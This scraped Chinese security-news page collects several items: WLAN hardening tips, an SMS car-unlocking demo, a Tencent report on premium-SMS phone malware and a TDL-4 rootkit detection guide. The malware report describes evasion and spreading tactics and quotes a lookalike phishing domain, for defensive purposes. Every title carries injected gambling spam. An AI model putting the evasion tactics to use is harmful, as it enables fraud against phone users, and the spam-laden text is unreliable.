WEP是802.11b无线局域网的标准网络安全协议。在传输信息时,WEP可以通过加密无线传输数据来提供类似有线传输的保护。在简便的安装和启动之后,应立即更改WEP密钥的缺省值。最理想的方式是WEP的密匙能够在用户登录后进行动态改变,这样,黑客想要获得无线网络的数据就需要不断跟踪这种变化。基于会话和用户的WEP密?管理技术能够实现最优保护,为网络增加另外一层防范,确保无线安全。 <br /><br />  5.WEP协议不是万能的 <br /><br />  不能将加密保障都寄希望于WEP协议。WEP只是多层网络安全措施中的一层,虽然这项技术在数据加密中具有相当重要的作用,但整个网络的安全不应该只依赖这一层的安全性能。但许多网络管理员很难接受这个观点。 <br /><br />  6.VPN是最好的网络安全技术之一 <br /><br />  如果每一项安全措施都是阻挡黑客进入网络前门的门锁,如SSID的变化、MAC地址的过滤功能和动态改变的WEP密?,那么,虚拟网(VPN)则是保护网络后门安全的关键。VPN具有比WEP协议更高层的网络安全性(第三层),能够支持用户和网络间端到端的安全隧道连接。 <br /><br />  7.提高已有的RADIUS服务 <br /><br />  大公司的远程用户常常通过RADIUS(远程用户拔号认证服务)实现网络认证登录。企业的IT网络管理员能够将无线局域网集成到已经存在的RADIUS架构内来简化对用户的管理。这样不仅能实现无线网络的认证,而且还能保证无线用户与远程用户使用同样的认证方法和帐号。 <br /><br />  8.简化网络安全管理:集成无线和有线网络安全策略 <br /><br />  无线网络安全不是单独的网络架构,它需要各种不同的程序和协议。制定结合有线和无线网络安全的策略能够提高管理水平,降低管理成本。例如,不论用户是通过有线还是无线方式进入网络时,都采用集成化的单一用户ID和密码。 <br /><br />  9.WLAN设备不全都一样 <br /><br />  尽管802.11b是一个标准的协议,所有获得WiFi标志认证的设备都可以进行基本功能的通信,但不是所有这样的无线设备都完全对等。虽然WiFi认证保证了设备间的互操作能力,但许多生产商的设备都不包括增强的网络安全功能。 <br /><br />  10.不能让非专业人员构建无线网络 <br /><br />  尽管现在无线局域网的构建已经相当方便,非专业人员可以在自己的办公室安装无线路由器和接入点设备,但是,他们在安装过程中很少考虑到网络的安全性,只要通过网络探测工具扫描网络就能够给黑客留下攻击的后门。因而,在没有专业系统管理员同意和参与的情况下,要限制无线网络的构建,这样才能保证无线安全。 <br /><br /> [黑客攻防]黑客演示一分钟短信偷汽车-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12915_1.html 佚名 黑客攻防 2011/8/23 10:12:37 &nbsp;<span style="color:#000000;">黑帽网络安全会议本月早些时候描述了两名来自iSEC的合作伙伴可以利用手机偷窃汽车,这两位名叫Don Bailey和Mat Solnik的安全研究人员今天通过网络视频演示了如何攻入一台锁上的斯巴鲁汽车。首先他们要了解一台特定汽车(必须配备车载手机或卫星报警系统装置的汽车)内置的电话号码,只需要用手机向汽车发送一条特别设计过的文字信息命令,汽车即可被解锁和启动。<br /><br />虽然他们并不能随便就能偷到车(因为必须获得特定的汽车号码和卫星识别码),但这次演示的价值在于文本信息并不是那么容易被阻止,因此使用短信来与呼叫服务中心进行联络的汽车始终有隐患。<br /><br />再扩展开来,无线系统并不仅仅在汽车上应用,大量的监控与数据采集系统(SCADA)经常也采用无线功能进行联络,这些设备涉及核电力工厂、水处理设施等,这些关键基础设施如可以被远程攻击,则后果不堪设想。<br /><br />iSEC并不是唯一的研究黑汽车的小组,《科学美国人》四月份曾报道美国加州大学圣迭戈分校的研究人员同样声称可以通过车载蓝牙和电话连接系统打开车锁并启动发动机,甚至还可以控制单个车轮的刹车等。</span><span style="color:#000000;"><br /></span><img height="21" alt="" src="http://www.cnbeta.com/articles/pic/vidicon.gif" border="0" lazyloaded="true" file="http://www.cnbeta.com/articles/pic/vidicon.gif" /><strong>观看:</strong><span style="BACKGROUND-COLOR: rgb(229,236,244)"><span style="font-family:Verdana;"><span style="FONT-SIZE: 14px"><a href="http://www.youtube.com/watch?v=bNDv00SGb6w&amp;feature=player_embedded" target="_blank">iSEC Partners presents: The Hacked and the Furious</a></span></span></span><br /><br /> [病毒漏洞]腾讯移动安全实验室公布手机吸费病毒的工作原理-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12865_1.html 西西 病毒漏洞 2011/8/17 10:02:23 <p>随着移动互联网的快速发展,手机吸费病毒作为一种新的手机病毒形式开始进入人们的视线。<strong>“吸费海盗王”、“美女勾魂吸费大盗”等吸费病毒近期陆续被腾讯移动安全实验室等手机安全机构公之于众,</strong>被查获的病毒不仅覆盖了Android、Symbian V3 V5等智能机操作系统、也覆盖了Kjava等功能手机操作系统。吸费病毒的频繁出现,引发手机用户不同程度上的疑虑和对移动安全的担忧。</p><p>腾讯移动安全实验室最新的网络调研数据显示,26%的用户遭遇过手机病毒,而38%的用户对于手机病毒最大的担心在于扣费、吸费。对于手机吸费病毒的成因、吸费原理、传播方式、产业链状况、以及规避对策等相关知识,73%的被调研用户表示希望了解。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710230727.png" />&nbsp;<img alt="" src="https://pic.cr173.com/up/2011-8/201181710231727.png" /></p><p>为了帮助用户更好的了解手机安全,解答手机用户关于吸费病毒的各类疑问,更好地保护用户手机安全,腾讯移动安全实验室专家采用专业的技术手段,对手机吸费病毒的相关信息进行全方位的解读、定位和剖析,并形成了实验室首份移动安全报告——《揭开手机吸费病毒的神秘面纱》,以飨读者。</p><p>{insd m=&quot;2&quot; i=&quot;17294&quot;}</p><p>本报告所有内容均为腾讯移动安全实验室及旗下QQ手机管家、在线查毒平台、恶意线索举报平台通过对各类吸费病毒样本和病毒产业链进行细致研究后所得成果,如有引用,请注明出处。</p><p><strong>第二章:吸费病毒原理</strong></p><p>腾讯移动安全实验室发现,吸费病毒的主要原理是通过自行发短信、拔打语音扣费电话,同时会删除或屏蔽收费相关的运营商回执短信、拔打电话、Wap上网等记录,让用户完全在不知不觉中被扣费。</p><p>2.1&nbsp;&nbsp;短信业务的扣费原理:</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231865.png" /></p><p>(图1)短信业务扣费原理示意图</p><p>2.2&nbsp;&nbsp;声讯/IVR业务的扣费原理:在手机后台自动拨打IVR电话,然后把拨打的相应记录</p><p>删除。</p><p>2.3 WAP业务的扣费原理:自动后台点击扣费节点。</p><p>2.4其他运营商增值业务的扣费原理:彩铃/炫铃/七彩铃的下载,采用短信、或IVR、</p><p>或WAP订购的方式。</p><p><strong>第三章:病毒的传播途径</strong></p><p>腾讯移动安全实验室研究发现,目前手机吸费病毒一般以嵌入正常功能软件、热门软件为主要载体,散播在众多论坛、电子市场、刷机ROM里,用户把这当作原版、加强版、破解版、美化版进行下载。</p><p><strong>3.1&nbsp;&nbsp;载体伪装途径:</strong></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;嵌在其他热门的正常软件里:嵌在知名游戏软件、工具软件中</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;专门开发出一种带功能性的免费软件,把病毒嵌入</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;扣费病毒不立即安装,先安装一个木马病毒,待用户量一定的时候,通过服务器给指令下载相关的扣费病毒,静默安装</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iv.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;伪装在主题类软件中,这是塞班最为常见的病毒载体</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;v.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;伪装为系统升级软件,诺基亚手机上经常出现</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;vi.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;伪装为杀毒软件,以前曾出现过伪360、伪卡巴等</p><p><strong>3.2&nbsp;&nbsp; 多种传播方式:</strong></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;群发内容为类似运营商发送的服务短信,短信内有链接,链接域名搞成类似运营商网址迷惑用户,如“伪升级扣费木马”,就使用http://1OO86.net(用字母O来伪装数字0)的域名来提供下载。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;在嵌入到多个热门软件后,把这些软件散布到各热门手机论坛与电子市场中,再运作一些破解、优化、美化、汉化、必装等字眼来诱惑用户下载安装,用户防不胜防。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;按正常有功能的软件来进行传播。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iv.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;伪装以该品牌该型号的补丁升级进行传播。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;v.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;集成在刷机ROM。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;vi.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;集成在一键安装包里。</p><p><strong>第四章&nbsp; 愈来愈隐蔽的病毒吸费</strong></p><p>随着扣费、屏蔽、云端控制技术的不断成熟,病毒吸费呈现出愈来愈隐蔽甚至无声无息的趋势。</p><p><strong>4.1 技术成熟让病毒吸费愈来愈隐蔽</strong></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;以前的病毒技术,一般是内置扣费的指令代码到病毒软件中,用户安装软件后,短时间内便会发作进行扣费;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;现在的技术,则已经发展到很成熟,很隐蔽:发送的扣费短信的指令、端口号、发送时间、发送频率均能做到云端(服务器)控制,做到短信指令、端口号,可以根据用户所在的地区、SIM卡所属的运营商进行可扣费的配置,并且可以随时更改;</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231601.jpg" /></p><p>(图2)吸费海盗王病毒反编译分析</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[f1]&nbsp;现在的技术都能轻易做到,在本机删除相关的扣费回执记录,包括特定运营商扣费短信、拨号记录、WAP上网记录。</p><p>4.2 <strong>“悄悄潜伏”让吸费病毒愈来愈隐蔽:</strong></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;不会立即发作,可以选择时间发作,如:等午夜时候才偷偷扣费;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;不会立即发作,从服务器取指令,按指令配置发作时间与方式;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;安装后,伪装为正常进程的名字,如系统进程,或其他软件进程进行潜伏;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iv.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;用户量潜伏,一些病毒制造者很有耐性,等被嵌入病毒的软件用户到达一定量后,才偷偷扣费。</p><p><strong>第五章 典型吸费病毒案例</strong></p><p><strong>5.1&nbsp;&nbsp;伪升级扣费木马</strong></p><p>病毒传播者利用向用户发送“中国移动提醒您,检测到您的手机存在安全漏洞,请点击下载并安装安全补丁http://1OO86.net/****.apk/sisx”(这里是<strong>字母“O”冒充数字“0”</strong>)的WAP PUSH短信,分别针对塞班与安卓发送识配的安装包,该病毒应该是拿到部分的用户号码与机型,用户点击下载安装后,病毒安装没有图标产生,并自动向“1062****”等端口号发送业务订购短信,同时还会屏蔽10086发给用户的所有信息,用户在毫不知情的情况下,被恶意扣取资费。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231658.jpg" /></p><p>(图3)QQ手机管家查杀伪升级扣费木马</p><p><strong>&nbsp;</strong></p><p><strong>5.2&nbsp;&nbsp; 伪卡巴扣费木马、伪杀毒抢钱王等</strong></p><p>这几个病毒主要是伪装为杀毒软件,用户安装后,立即假装扫描手机内的文件,然后<strong>谎称查到几个杀毒软件,需要用户付费**元查杀病毒</strong>。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231779.jpg" /></p><p>(图4)QQ手机管家扫描伪杀毒病毒报告</p><p><strong>5.3吸费海盗王</strong></p><p>此病毒嵌入到一款国外著名的游戏软件里,散布在几个大的论坛与电子市场上,</p><p>另外,病毒发作时也是隐蔽的短信扣费,扣费指令与发送时机由云端配置,但这</p><p>个病毒在扣费成功后,还会向固定的几个手机号码发送扣费手机的IMEI号等信</p><p>息,部分存在分成对帐的可能。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231400.jpg" /></p><p>(图5)QQ手机管家截获“吸费海盗王”病毒</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231601.jpg" /></p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231466.jpg" /></p><p>(图6)“吸费海盗王”病毒云端控制功能以及窃取用户隐私</p><p><strong>5.4&nbsp;&nbsp;美女勾魂吸费大盗</strong></p><p>病毒嵌入到三款叫“美女**”的工具软件中,安装后,<strong>伪装为系统进程</strong>,让用户不容易发现,并进行暗中短信扣费。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231449.jpg" /></p><p>(图7)QQ手机管家查杀美女勾魂吸费大盗病毒</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231626.jpg" /></p><p>(图8)美女勾魂病毒伪装成系统程序“设置”</p><p><strong>5.5&nbsp;&nbsp;饥渴吸费魔</strong></p><p>此病毒嵌入了许多款的正常软件中,这些软件曾经遍布多个大论坛与电子市</p><p>场,发作时,除了由云端配置隐蔽的短信扣费外,还会偷偷盗打<strong>IVR电话</strong>,</p><p>此病毒的发现,表明吸费已经从短信,横向跨度到IVR了。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231390.jpg" /></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(图9)饥渴吸费魔嵌入了许多款正常软件</p><p><strong>第六章&nbsp;手机吸费病毒发展趋势预测</strong></p><p><strong>6.1&nbsp;&nbsp;灰色产业链呈现逐渐成熟的趋势。</strong></p><p>目前,吸费病毒的产业链已经呈现出不断成熟的趋势,从病毒开发、病毒营销传播、</p><p>病毒吸费拓展(找SP合作)、病毒收益对帐分成等环节,都有相应专业的角色或功</p><p>能相对应。简单来说,就是病毒从用户手机私自扣费后,相关产业链的角色都能从</p><p>中分取利益,特别是病毒开发、营销,还有SP。</p><p>6.2&nbsp;&nbsp;<strong>吸费病毒变种越来越多。</strong>由于吸费病毒技术已经不断完善,可以通过云端服务器随意控制扣费端口、扣费时间、扣费频率,可根据用户所在地SIM卡运营商对扣费方式进行配置,因此吸费病毒可以不断变种。再加上当前智能手机应用种类丰富,病毒有了可以不断复制的条件,只要将原病毒代码稍作修改一些参数、变量,嵌入不同的手机应用中,都可以成为一款新吸费病毒。</p><p><strong>6.3&nbsp;&nbsp;规模可能超过PC产业。</strong>此外,手机吸费病毒产业链已经开始逐步完善,从制毒到传播,再到找SP扣费等一系列环节都有专人负责,每个环节都能够精准的获得吸费分成,因此手机吸费病毒产业会呈现不断发展壮大趋势,手机用户数量远远大于PC用户数,智能终端大面积普及,手机吸费病毒规模可能会远高于PC病毒产业。</p><p><strong>6.4&nbsp;&nbsp;用户维权取证难。</strong>与此同时,手机吸费病毒相比PC病毒更容易直接获益,而且对于每个被吸费用户来说只是几元到几十元不等,由于数额较小,单个受害者很难维权。加上其高超的伪装术,自动定制服务,自动删除扣费回执信息,导致用户很难发现被吸费,即使发现被吸费之后,也难以对吸费病毒的作案行为进行有效取证,无法通过技术手段证明是病毒私自定制了服务,而不是用户定制了服务,因此最终都不了了之。</p><p><strong>第七章&nbsp;关于移动安全的用户常见误区&nbsp; </strong></p><p><strong>误区一:手机病毒、木马很可怕</strong></p><p>1)&nbsp;&nbsp;正确看待手机病毒和木马可能带来的危害</p><p>病毒与木马,可以实现多种危害,危害从高至低排序有:恶意扣费、远程控制、</p><p>隐私窃取、恶意传播、资费消耗、系统破坏、诈骗欺诈、流氓行为等,取其中</p><p>几项举例说明如下:</p><p>a)&nbsp;&nbsp;危害比较高的:(1)恶意扣费:通过隐蔽执行、欺骗用户点击等手段,订购各类收费业务或使用手机支付,导致用户经济损失的;(2)远程控制:能够接受远程控制端指令并进行相关操作。(3)获取涉及用户隐私信息,如用户的通讯内容、邮件内容,各种手机上的帐号密码,各种文件、照片、通讯录等。</p><p>b)&nbsp;&nbsp;危害比较低的:流氓行为,如自动添加、修改、删除收藏夹、快捷方式,弹出广告窗口,不能退出软件,无法正常卸载、删除等。</p><p>2)&nbsp;&nbsp;移动病毒和木马的产业链发展状况目前尚未成熟</p><p>移动病毒和木马已经发展到产业链驱动,如恶意扣费木马,就分为病毒制造者、</p><p>病毒传播运营、病毒扣费商务拓展、病毒扣费SP等的角色。现在,恶意扣费木</p><p>马的技术一般包括软件篡改、伪装传播、云端控制、根据用户不同的区域进行</p><p>不同形式的扣费等技术,这些技术已经比较成熟,使用同样的技术,只要修改</p><p>不同的类名,进行不同的打包,就可以复制为新的病毒。</p><p>整个移动病毒和木马的产业链发展状况相对PC尚不成熟。</p><p><strong>&nbsp;</strong></p><p><strong>误区二:没有多少移动病毒和木马,因为我和我的朋友都没有遇到过</strong></p><p>现发现的手机病毒与木马已超千种,被感染的软件已超万个。现在的病毒与木马技术日渐成熟,且趋向于隐蔽化与智能化,可以使手机用户在感觉不到中毒的情况下就已经产生了危害。</p><p>拿恶意扣费木马来举例:</p><p>1)&nbsp;&nbsp;例一:隐蔽伪装与传播方式:病毒和木马采用多种方式进行伪装,如:把恶意</p><p>代码嵌入到众多的热门软件中,或者开发一个正常功能类的软件,然后把这些</p><p>软件散布到各热门论坛与电子市场中,再运作一些破解、优化、美化、汉化、</p><p>必装、最强等字眼来诱惑用户下载安装,用户安装了这个软件后,病毒和木马</p><p>就已经被安装到移动设备上了。</p><p>2)&nbsp;&nbsp;例二:采用提示升级的方式进行安装:先提供完全没有问题的正常的软件给用户安装,软件在使用一段时间后,提示软件升级,在用户确认同意升级时,才下升安装了病毒包。</p><p>3)&nbsp;&nbsp;例三:潜伏伺机发作:一般是安装的时候不立即发作,伺机联网从云端获取指令,再按指令控制发起扣费操作时间,扣费发送目标端口等。</p><p>4)&nbsp;&nbsp;例四:拦截删掉所有发送的扣费与确认扣费的短信或IVR电话等通讯记录,用户在不知不觉的情况下就已经被扣费。</p><p><strong>&nbsp;</strong></p><p><strong>误区三:安装知名软件或是正规电子市场、网站或论坛下载一定无风险</strong> </p><p>通常知名的软件也是被病毒和木马篡改或嵌入的重点目标之一,而一般的用户是难以在安装的过程中进行判断的,在安装后也难以判断,因为这些软件的正常功能还是可以使用的。所以,不是软件名称为知名的软件就安全。而是要从知名软件的官方网站下载安装,以确保手机安全软件未被嵌入病毒。</p><p>部分的病毒和木马也是通过正规的电子市场、网站、论坛进行传播的,而病毒和木马的后发作型或后安装型,都会使一般的用户难以判断现在下载与安装的是否为安全软件。</p><p><strong>第八章&nbsp; 专家支招:如何规避手机吸费病毒风险</strong></p><p>1)&nbsp; 不要轻易打开陌生人短信中的网址链接,以防下载木马。遇到升级要求或者下载提示,不要随便点“同意”,要保持充分的警惕性。</p><p>2) 尽量到软件的官网、或官网授权进行下载,或是安全可靠的站点下载软件。一定不要轻易从手机论坛、不知名的应用市场中下载手机软件,而是要到经过安全认证,有品牌知名度的手机应用下载站下载手机软件,比如,手机腾讯网应用中心、QQ手机管家的“人气推荐”“装机必备”。也可以使用QQ电脑管家的手机管理功能,可以直接在电脑上安装QQ手机管家,同时还提供万款手机软件免费下载。</p><p>3) 安装专业大品牌手机安全软件,并经常更新最新病毒库,实时监控各种可能原来没有毒,但后来升级或安装新的病毒的软件。比如,QQ手机管家、金山手机卫士等。<br /><br />QQ手机管家 Android版:<a href="http://www.pjyuanjian.com/soft/17294.html">http://www.pjyuanjian.com/soft/17294.html</a></p> [病毒漏洞]使用PowerTool轻松检测魔影病毒(TDSS.TDL-4)-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12812_1.html 西西 病毒漏洞 2011/8/14 9:41:39 <p>&nbsp;就不过多重复了,为了保护自己的篡改的MBR,可谓是用尽可手段,<br /><br /><strong>PowerTool可以在不恢复和修改TDL-4任何钩子的情况下,<br />直接穿透它的防护,检测到TDL-4 rootkit</strong><br /><br /><br />PowerTool 下载:<a href="http://www.pjyuanjian.com/soft/5029.html">http://www.pjyuanjian.com/soft/5029.html</a><br /><br />首先,有两个地方,大家可能以前就知道了,<br />一个是工作列线程<br /><img alt="" src="https://pic.cr173.com/up/2011-8/201181494143321.jpg" /><br /><br /><br />一个是StartIO的钩子<br /><img alt="" src="https://pic.cr173.com/up/2011-8/201181494143146.jpg" /><br /><br /><br />这个以前版本的PowerTool就可以检测到<br />这次加强了内核模块的检测,可以看到TDL-4的隐藏驱动<br /><img alt="" src="https://pic.cr173.com/up/2011-8/201181494143509.jpg" /><br /><br /><br />TDL-4还劫持了ATAPI的设备<br /><img alt="" src="https://pic.cr173.com/up/2011-8/201181494143413.jpg" /><br /><br /><br />如果以上,大家还不能确认是否是真的中了TDL-4病毒的话<br />最后一个,可以彻底让它露出真面目,<br /><br />在MBR里面点击强力检测按钮(目前不支持AHCI/RAID/SCSI模式)<br />可以完全穿透TDL-4的防护,检测到MBR<br /><img alt="" src="https://pic.cr173.com/up/2011-8/201181494143358.jpg" /><br /><br /><br /><br />清除的话,建议大家可以用卡巴或者BitDefender的专杀工具<br />也可以到PE系统里面,修复MBR来清除<br /><br />以后PT会进一步加强清楚的工作,呵呵 </p> [病毒漏洞]美国10岁女黑客发现iOS和Android上农场游戏漏洞-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12733_1.html 西西 病毒漏洞 2011/8/7 23:19:19 <p>拉斯维加斯Defcon的最新消息,一名化名为CyFi的10岁女黑客,独立安全研究人员宣告了一个iOS和Android设备上的游戏漏洞,她最早在2011年1月份发现了这些漏洞,因为她“对农场的游戏感到厌烦”,因此决定披露它。</p><p>这个漏洞可以让玩家更改作物成熟的时间,从而对游戏厂商的正常规则提出挑战。尽管多数游戏开发商会阻止这种“催熟”作物的行为,但CyFi还是表示已经发现了破解的方法。<br /><br />这名年轻的黑客将因为披露该漏洞而获得来自AllClearID身份保护公司的100美元奖励。在1000人面前让一名10岁的女孩子当众发表演讲显然有难度,因此黑客大会很贴心地用10分钟长的片子来完成了这一切。<br /><br /><img src="https://pic.cr173.com/up/2011-8/201187231929233.jpg" alt="" /></p> [安全产品]全方位解析360杀毒3.0尝鲜版高清视频-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/12728_1.html 西西 安全产品 2011/8/6 21:53:55 <p>从2.0时代到3.0时代,360杀毒走过了不一样的旅程;在3.0时代360杀毒的主动防御体系发生了本质的变化!那么到底发生了什么变化呢?接下来让我们来看看听风阁同学做的精彩视频吧!<br /><br /><embed pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" src="http://player.youku.com/player.php/sid/XMjkxNjgwMDQ0/v.swf " width="460" height="390" type="application/x-shockwave-flash" wmode="Transparent" allowscriptaccess="never" allownetworking="internal" invokeurls="false"></embed><br /><br /><a href="http://www.pjyuanjian.com/soft/30968.html" target="_blank">点击下载360杀毒3.0尝鲜版 </a></p><p><br />突破性Pro3D全面防御体系12层防护 <br />防御病毒最全面电脑真实系统防御与虚拟化沙箱的完美结合:<br 